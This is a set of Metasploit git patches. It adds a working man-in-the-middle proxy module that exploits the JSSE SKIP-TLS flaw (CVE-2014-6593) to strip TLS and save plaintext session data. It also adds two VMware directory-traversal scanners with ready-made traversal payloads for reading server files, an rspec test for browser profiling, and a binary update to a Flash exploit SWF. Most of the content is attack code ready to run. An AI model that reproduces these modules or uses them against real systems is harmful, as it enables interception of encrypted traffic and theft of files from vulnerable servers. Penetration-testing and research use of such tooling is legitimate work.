diff --git a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
new file mode 100644
index 0000000000..1f189ba8da
--- /dev/null
+++ b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
@@ -0,0 +1,248 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'openssl'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+
+  def initialize
+    super(
+      'Name'        => 'Java Secure Socket Extension (JSSE) SKIP-TLS MITM Proxy',
+      'Description'    => %q{
+        This module exploits an incomplete internal state distinction in Java Secure
+        Socket Extension (JSSE) by impersonating the server and finishing the
+        handshake before the peers have authenticated themselves and instantiated
+        negotiated security parameters, resulting in a plaintext SSL/TLS session
+        with the client. This plaintext SSL/TLS session is then proxied to the
+        server using a second SSL/TLS session from the proxy to the server (or an
+        alternate fake server) allowing the session to continue normally and
+        plaintext application data transmitted between the peers to be saved. This
+        module requires an active man-in-the-middle attack.
+      },
+      'Author'      =>
+        [
+          'Ramon de C Valle'
+        ],
+      'License' => MSF_LICENSE,
+      'Actions'     =>
+        [
+          [ 'Service' ]
+        ],
+      'PassiveActions' =>
+        [
+          'Service'
+        ],
+      'DefaultAction'  => 'Service',
+      'References' => [
+        ['CVE', '2014-6593'],
+        ['CWE', '372'],
+        ['URL', 'https://www.smacktls.com/#skip'],
+        ['URL', 'https://www.smacktls.com/smack.pdf'],
+        ['URL', 'http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html'],
+        ['URL', 'https://www-304.ibm.com/support/docview.wss?uid=swg21695474']
+      ],
+      'DisclosureDate' => 'Jan 20 2015'
+    )
+
+    register_options(
+      [
+        OptString.new('FAKEHOST', [ false, 'The fake server address', nil]),
+        OptString.new('FAKEPORT', [ false, 'The fake server port', 443]),
+        OptString.new('HOST', [ true, 'The server address', nil]),
+        OptString.new('PORT', [ true, 'The server port', 443]),
+        OptString.new('SRVHOST', [ true, 'The proxy address', '0.0.0.0']),
+        OptString.new('SRVPORT', [ true, 'The proxy port', 443]),
+        OptInt.new('TIMEOUT', [ true, 'The timeout, in seconds', 5])
+      ], self.class)
+  end
+
+  def PRF(secret, label, seed)
+    if secret.empty?
+      s1 = s2 = ''
+    else
+      length = ((secret.length * 1.0) / 2).ceil
+      s1 = secret[0..(length - 1)]
+      s2 = secret[(length - 1)..(secret.length - 1)]
+    end
+
+    hmac_md5 = OpenSSL::HMAC.digest(OpenSSL::Digest.new('md5'), s1, label + seed)
+    hmac_sha = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), s2, label + seed)
+
+    hmac_md5 = OpenSSL::HMAC.digest(OpenSSL::Digest.new('md5'), s1, hmac_md5 + label + seed)
+    hmac_sha = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), s2, hmac_sha + label + seed)
+
+    result = ''
+    [hmac_md5.length, hmac_sha.length].max.times { |i| result << [(hmac_md5.getbyte(i) || 0) ^ (hmac_sha.getbyte(i) || 0)].pack('C') }
+    result
+  end
+
+  def PRF_SHA256(secret, label, seed)
+    hmac_hash = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), secret, label + seed)
+    OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), secret, hmac_hash + label + seed)
+  end
+
+  def run
+    fake_host = datastore['FAKEHOST'] || datastore['HOST']
+    fake_port = datastore['FAKEPORT'] || datastore['PORT']
+    host = datastore['HOST']
+    local_host = datastore['SRVHOST']
+    local_port = datastore['SRVPORT']
+    port = datastore['PORT']
+    timeout = datastore['TIMEOUT']
+
+    proxy = TCPServer.new(local_host, local_port)
+    print_status('Listening on %s:%d' % [proxy.addr[2], proxy.addr[1]])
+
+    loop do
+      Thread.start(proxy.accept) do |client|
+      #loop do
+        finished_sent = false
+        handshake_messages = ''
+        application_data = ''
+
+        #client = proxy.accept
+
+        print_status('Accepted connection from %s:%d' % [client.addr[2], client.addr[1]])
+
+        context = OpenSSL::SSL::SSLContext.new(:TLSv1_2)
+        context.verify_mode = OpenSSL::SSL::VERIFY_NONE
+
+        tcp_socket = TCPSocket.new(fake_host, fake_port)
+        fake_server = OpenSSL::SSL::SSLSocket.new(tcp_socket, context)
+        fake_server.connect
+
+        print_status('Connected to %s:%d' % [fake_host, fake_port])
+
+        server = Socket.new(Socket::AF_INET, Socket::SOCK_STREAM)
+
+        begin
+          server.connect_nonblock(Socket.pack_sockaddr_in(port, host))
+
+        rescue IO::WaitWritable
+          raise Errno::ETIMEDOUT if IO.select(nil, [server], nil, timeout).nil?
+        end
+
+        print_status('Connected to %s:%d' % [host, port])
+
+        begin
+          loop do
+            readable, _, _ = IO.select([client, server])
+
+            readable.each do |r|
+              case r
+              when fake_server
+                # The fake_server (i.e., server) is an SSL socket; Read
+                # application data directly.
+                header = ''
+                fragment = r.readpartial(4096)
+
+              else
+                header = r.read(5)
+                raise EOFError if header.nil?
+                fragment = r.read(header[3, 2].unpack('n')[0])
+              end
+
+              print_status('%d bytes received' % [header.length + fragment.length])
+
+              # Drop the server hello done message and send the finished
+              # message in plaintext.
+              if fragment =~ /^\x0e\x00\x00\x00/
+                if header[2, 1] == "\x03"
+                  verify_data = PRF_SHA256('', 'server finished', OpenSSL::Digest::SHA256.digest(handshake_messages))
+                  verify_data = verify_data[0, 12]
+                else
+                  verify_data = PRF('', 'server finished', OpenSSL::Digest::MD5.digest(handshake_messages) + OpenSSL::Digest::SHA1.digest(handshake_messages))
+                  verify_data = verify_data[0, 12]
+                end
+
+                finished = "\x14#{[verify_data.length].pack('N')[1, 3]}#{verify_data}"
+                record = header[0, 3] + [finished.length].pack('n') + finished
+
+                count = client.write(record)
+                client.flush
+                print_status('%d bytes sent' % [count])
+
+                finished_sent = true
+
+                # Change to the SSL socket connected to the same server or
+                # to an alternate fake server.
+                server.close
+                server = fake_server
+
+                # Save version used in the handshake
+                version = header[2, 1]
+
+                next
+              else
+                # Save handshake messages
+                handshake_messages << fragment
+              end unless finished_sent
+
+              # Save application data
+              application_data << fragment if finished_sent
+
+              case r
+              when client
+                if finished_sent
+                  # The server (i.e., fake_server) is an SSL socket
+                  count = server.write(fragment)
+                else
+                  # The server isn't an SSL socket
+                  count = server.write(header + fragment)
+                end
+
+                server.flush
+                print_status('%d bytes sent' % [count])
+
+              when fake_server
+                # The client isn't an SSL socket; Add the record layer header
+                # with the same version used in the handshake.
+                header = "\x17\x03#{version}" + [fragment.length].pack('n')
+                record = header + fragment
+                count = client.write(record)
+                client.flush
+                print_status('%d bytes sent' % [count])
+
+              when server
+                record = header + fragment
+                count = client.write(record)
+                client.flush
+                print_status('%d bytes sent' % [count])
+              end
+            end
+          end
+
+        rescue EOFError, Errno::ECONNRESET
+          path = store_loot(
+            'tls.application_data',
+            'application/octet-stream',
+            client.addr[2],
+            application_data,
+            'application_data',
+            'TLS session application data'
+          )
+
+          print_good("SSL/TLS session application data successfully stored in #{path}")
+
+          client.close
+          fake_server.close
+          server.close
+
+          next
+        end
+
+        client.close
+        fake_server.close
+        server.close
+      end
+    end
+
+    proxy.close
+  end
+
+end

From 49e4820c57137f36eb95279f0899972651482c72 Mon Sep 17 00:00:00 2001
From: root <void-in@users.noreply.github.com>
Date: Tue, 9 Jun 2015 10:42:53 +0500
Subject: [PATCH 0359/1013] Add depcrecated note to the existing modules

---
 .../scanner/http/vmware_server_dir_trav.rb    | 87 +++++++++++++++++++
 .../http/vmware_update_manager_traversal.rb   | 75 ++++++++++++++++
 2 files changed, 162 insertions(+)
 create mode 100644 modules/auxiliary/scanner/http/vmware_server_dir_trav.rb
 create mode 100644 modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb

diff --git a/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb b/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb
new file mode 100644
index 0000000000..ad5a26474b
--- /dev/null
+++ b/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb
@@ -0,0 +1,87 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  # Exploit mixins should be called first
+  include Msf::Exploit::Remote::HttpClient
+  # Scanner mixin should be near last
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+  include Msf::Module::Deprecated
+
+  deprecated(Date.new(2015,7,21), 'auxiliary/scanner/vmware/vmware_server_dir_trav')
+
+  def initialize
+    super(
+      'Name'        => 'VMware Server Directory Traversal Vulnerability',
+      'Description' => 'This modules exploits the VMware Server Directory Traversal
+        vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before
+        2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5
+        allows remote attackers to read arbitrary files. Common VMware server ports
+        80/8222 and 443/8333 SSL.  If you want to download the entire VM, check out
+        the gueststealer tool.',
+      'Author'      => 'CG' ,
+      'License'     => MSF_LICENSE,
+      'References'	=>
+        [
+          [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2009-0015.html' ],
+          [ 'OSVDB', '59440' ],
+          [ 'BID', '36842' ],
+          [ 'CVE', '2009-3733' ],
+          [ 'URL', 'http://fyrmassociates.com/tools/gueststealer-v1.1.pl' ]
+        ]
+    )
+    register_options(
+      [
+        Opt::RPORT(8222),
+        OptString.new('FILE', [ true,  "The file to view", '/etc/vmware/hostd/vmInventory.xml']),
+        OptString.new('TRAV', [ true,  "Traversal Depth", '/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E']),
+      ], self.class)
+  end
+
+  def run_host(target_host)
+
+    begin
+      file = datastore['FILE']
+      trav = datastore['TRAV']
+      res = send_request_raw({
+        'uri'          => trav+file,
+        'version'      => '1.1',
+        'method'       => 'GET'
+      }, 25)
+
+      if res.nil?
+        print_error("Connection timed out")
+        return
+      end
+
+      if res.code == 200
+        #print_status("Output Of Requested File:\n#{res.body}")
+        print_status("#{target_host}:#{rport} appears vulnerable to VMWare Directory Traversal Vulnerability")
+        report_vuln(
+          {
+            :host   => target_host,
+            :port	=> rport,
+            :proto  => 'tcp',
+            :name	=> self.name,
+            :info   => "Module #{self.fullname} reports directory traversal of #{target_host}:#{rport} with response code #{res.code}",
+            :refs   => self.references,
+            :exploited_at => Time.now.utc
+          }
+        )
+      else
+        vprint_status("Received #{res.code} for #{trav}#{file}")
+      end
+
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
+      print_error(e.message)
+    rescue ::Timeout::Error, ::Errno::EPIPE
+    end
+  end
+
+end
diff --git a/modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb b/modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb
new file mode 100644
index 0000000000..837ab58a29
--- /dev/null
+++ b/modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb
@@ -0,0 +1,75 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Module::Deprecated
+
+  deprecated(Date.new(2015,7,21), 'auxiliary/scanner/vmware/vmware_update_manager_traversal')
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "VMWare Update Manager 4 Directory Traversal",
+      'Description'    => %q{
+        This modules exploits a directory traversal vulnerability in VMWare Update Manager
+        on port 9084.  Versions affected by this vulnerability: vCenter Update Manager
+        4.1 prior to Update 2, vCenter Update Manager 4 Update 4.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Alexey Sintsov',  #Initial discovery, poc
+          'sinn3r'           #Metasploit
+        ],
+      'References'     =>
+        [
+          ['CVE', '2011-4404'],
+          ['EDB', '18138'],
+          ['URL', 'http://www.vmware.com/security/advisories/VMSA-2011-0014.html'],
+          ['URL', 'http://dsecrg.com/pages/vul/show.php?id=342']
+        ],
+      'DisclosureDate' => "Nov 21 2011"))
+
+    register_options(
+      [
+        Opt::RPORT(9084),
+        OptString.new('URIPATH', [true, 'URI path to the downloads', '/vci/downloads/']),
+        OptString.new('FILE', [true, 'Define the remote file to download', 'windows\\win.ini'])
+      ], self.class)
+  end
+
+  def run_host(ip)
+    fname     = File.basename(datastore['FILE'])
+    traversal = ".\\..\\..\\..\\..\\..\\..\\..\\"
+    uri = normalize_uri(datastore['URIPATH']) + traversal + datastore['FILE']
+
+    print_status("#{rhost}:#{rport} - Requesting: #{uri}")
+
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri'    => uri
+    }, 25)
+
+    # If there's no response, don't bother
+    if res.nil? or res.body.empty?
+      print_error("No content retrieved from: #{ip}")
+      return
+    end
+
+    if res.code == 404
+      print_error("#{rhost}:#{rport} - File not found")
+      return
+    else
+      print_good("File retrieved from: #{ip}")
+      p = store_loot("vmware.traversal.file", "application/octet-stream", rhost, res.to_s, fname)
+      print_status("File stored in: #{p}")
+    end
+  end
+end

From 1fe2361e128049712839cfb4101569d647425c28 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 9 Jun 2015 02:23:27 -0500
Subject: [PATCH 0360/1013] Add rspec for BrowserProfileManager

---
 .../remote/browser_profile_manager_spec.rb    | 158 ++++++++++++++++++
 1 file changed, 158 insertions(+)
 create mode 100644 spec/lib/msf/core/exploit/remote/browser_profile_manager_spec.rb

diff --git a/spec/lib/msf/core/exploit/remote/browser_profile_manager_spec.rb b/spec/lib/msf/core/exploit/remote/browser_profile_manager_spec.rb
new file mode 100644
index 0000000000..c048fd0ef9
--- /dev/null
+++ b/spec/lib/msf/core/exploit/remote/browser_profile_manager_spec.rb
@@ -0,0 +1,158 @@
+require 'spec_helper'
+require 'msf/core'
+
+describe Msf::Exploit::Remote::BrowserProfileManager do
+
+
+  def mock_report_note(args)
+    # args example:
+    # {:type=>"blLGFIlwYrxfvcY.new_tag", :data=>"\x81\xB7blLGFIlwYrxfvcY.new_tag\x80", :update=>:unique}
+    @notes.each do |note|
+      if note.ntype == args[:type]
+        allow(note).to receive(:data).and_return(args[:data])
+        return
+      end
+    end
+
+    # No profile found
+    note = create_fake_note(args[:type], args[:data])
+    @notes << note
+  end
+
+  def create_fake_note(tag, data)
+    note = double('note')
+    allow(note).to receive(:ntype).and_return(tag)
+    allow(note).to receive(:data).and_return(data)
+
+    note
+  end
+
+  # When unpacked, this gives us:
+  # {
+  #   "BAP.1433806920.Client.blLGFIlwYrxfvcY" => {
+  #     "source"      => "script",
+  #     "os_name"     => "Windows 8.1",
+  #     "os_vendor"   => "undefined",
+  #     "os_device"   => "undefined",
+  #     "ua_name"     => "Firefox",
+  #     "ua_ver"      => "35.0",
+  #     "arch"        => "x86",
+  #     "java"        => "1.7",
+  #     "silverlight" => "false",
+  #     "flash"       => "14.0",
+  #     "vuln_test"   => "true",
+  #     "proxy"       => false,
+  #     "language"    => "en-US,en;q=0.5",
+  #     "tried"       => true
+  # }}
+  let(:profile_packed_data) do
+    "\x81\xD9%BAP.1433806920.Client.blLGFIlwYrxfvcY\x8E\xA6source\xA6script\xA7os_name\xABWindows 8.1\xA9os_vendor\xA9undefined\xA9os_device\xA9undefined\xA7ua_name\xA7Firefox\xA6ua_ver\xA435.0\xA4arch\xA3x86\xA4java\xA31.7\xABsilverlight\xA5false\xA5flash\xA414.0\xA9vuln_test\xA4true\xA5proxy\xC2\xA8language\xC4\x0Een-US,en;q=0.5\xA5tried\xC3"
+  end
+
+  let(:profile_tag) do
+    MessagePack.unpack(profile_packed_data).keys.first.split('.')[3]
+  end
+
+  let(:note_type_prefix) do
+    MessagePack.unpack(profile_packed_data).keys.first.split('.')[0,3] * "."
+  end
+
+  subject do
+    mod = Msf::Exploit::Remote.allocate
+    mod.extend Msf::Exploit::Remote::BrowserExploitServer
+    mod.extend described_class
+    mod.send(:initialize)
+    mod.send(:datastore=, {'NoteTypePrefix' => note_type_prefix})
+    mod
+  end
+
+  let(:framework) do
+    framework = double('Msf::Framework', datastore: {})
+
+    notes = [create_fake_note("#{note_type_prefix}.#{profile_tag}", profile_packed_data)]
+    @notes = notes
+
+    db = double('db')
+    allow(db).to receive(:report_note).with(kind_of(Hash)) { |arg| mock_report_note(arg) }
+    allow(db).to receive(:notes).and_return(notes)
+    allow(framework).to receive(:db).and_return(db)
+
+    framework
+  end
+
+  before(:each) do
+    allow_any_instance_of(described_class).to receive(:framework).and_return(framework)
+  end
+
+  describe '#note_type_prefix' do
+    context  'when note_type_prefix is used' do
+      it 'raises a NoMethodError exception' do
+        expect(subject.note_type_prefix).to eq(note_type_prefix)
+      end
+    end
+  end
+
+  describe '#get_profile_info' do
+
+    let(:found_profile) do
+    end
+
+    context 'when profile is found' do
+      it 'returns a hash with the profile' do
+        found_profile = subject.get_profile_info(profile_tag)
+        found_profile_key = found_profile.keys.first
+        found_profile_data = found_profile[found_profile_key]
+        profile_data = MessagePack.unpack(profile_packed_data).values.first
+        expect(found_profile).to be_kind_of(Hash)
+        expect(found_profile_data).to eq(profile_data)
+      end
+    end
+
+    context 'when a profile is not found' do
+      it 'returns an empty hash' do
+        bad_profile_tag = 'bad_profile_tag'
+        found_profile = subject.get_profile_info(bad_profile_tag)
+        expect(found_profile).to be_kind_of(Hash)
+        expect(found_profile).to be_empty
+      end
+    end
+  end
+
+  describe '#update_profile' do
+
+    let(:key_to_update) { 'os_name' }
+
+    let(:os_value) { 'Windows 7' }
+
+    context 'when no profile is on the database' do
+      let(:new_profile_tag) { 'new_tag' }
+      it 'creates a new profile' do
+      end
+
+      it 'updates data to the new profile' do
+        subject.update_profile(new_profile_tag, key_to_update, os_value)
+        expect(subject.get_profile_info(new_profile_tag).keys.first).to eq("#{note_type_prefix}.#{new_profile_tag}")
+        expect(subject.get_profile_info(new_profile_tag).values.first).to eq({key_to_update => os_value})
+      end
+    end
+
+    context 'when the profile is found on the database' do
+      it 'updates the profile' do
+        expect(subject.get_profile_info(profile_tag).values.first[key_to_update]).to eq('Windows 8.1')
+        subject.update_profile(profile_tag, key_to_update, os_value)
+        expect(subject.get_profile_info(profile_tag).values.first[key_to_update]).to eq(os_value)
+      end
+    end
+  end
+
+  describe '#init_profile' do
+    context 'creates a tag is provided' do
+      it 'creates a new profile' do
+        expect(@notes.length).to eq(1)
+        subject.init_profile('new')
+        expect(@notes.length).to eq(2)
+      end
+    end
+  end
+
+end
\ No newline at end of file

From b7f0fad72f0dbb276369bd6f22985eca64d33450 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 9 Jun 2015 11:31:39 -0500
Subject: [PATCH 0361/1013] Modify CVE-2014-0569 to use the flash exploitation
 code

---
 data/exploits/CVE-2014-0569/msf.swf           | Bin 18021 -> 20782 bytes
 external/source/exploits/CVE-2014-0569/Elf.as | 235 +++++++++++
 .../source/exploits/CVE-2014-0569/Exploit.as  | 114 +++++
 .../CVE-2014-0569/ExploitByteArray.as         |  85 ++++
 .../exploits/CVE-2014-0569/ExploitVector.as   |  74 ++++
 .../exploits/CVE-2014-0569/Exploiter.as       | 399 ++++++++++++++++++
 .../source/exploits/CVE-2014-0569/Logger.as   |  32 ++
 .../source/exploits/CVE-2014-0569/Main.as     | 287 -------------
 external/source/exploits/CVE-2014-0569/PE.as  |  72 ++++
 .../adobe_flash_casi32_int_overflow.rb        |  22 +-
 10 files changed, 1024 insertions(+), 296 deletions(-)
 create mode 100755 external/source/exploits/CVE-2014-0569/Elf.as
 create mode 100755 external/source/exploits/CVE-2014-0569/Exploit.as
 create mode 100755 external/source/exploits/CVE-2014-0569/ExploitByteArray.as
 create mode 100755 external/source/exploits/CVE-2014-0569/ExploitVector.as
 create mode 100755 external/source/exploits/CVE-2014-0569/Exploiter.as
 create mode 100755 external/source/exploits/CVE-2014-0569/Logger.as
 delete mode 100755 external/source/exploits/CVE-2014-0569/Main.as
 create mode 100755 external/source/exploits/CVE-2014-0569/PE.as

diff --git a/data/exploits/CVE-2014-0569/msf.swf b/data/exploits/CVE-2014-0569/msf.swf
index a124c560f09b1a9ff03b1080ce13873cecc9d9d6..f771382e56e7adaccc4f73f87bb01c34e97dedd0 100755
GIT binary patch
delta 20663
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
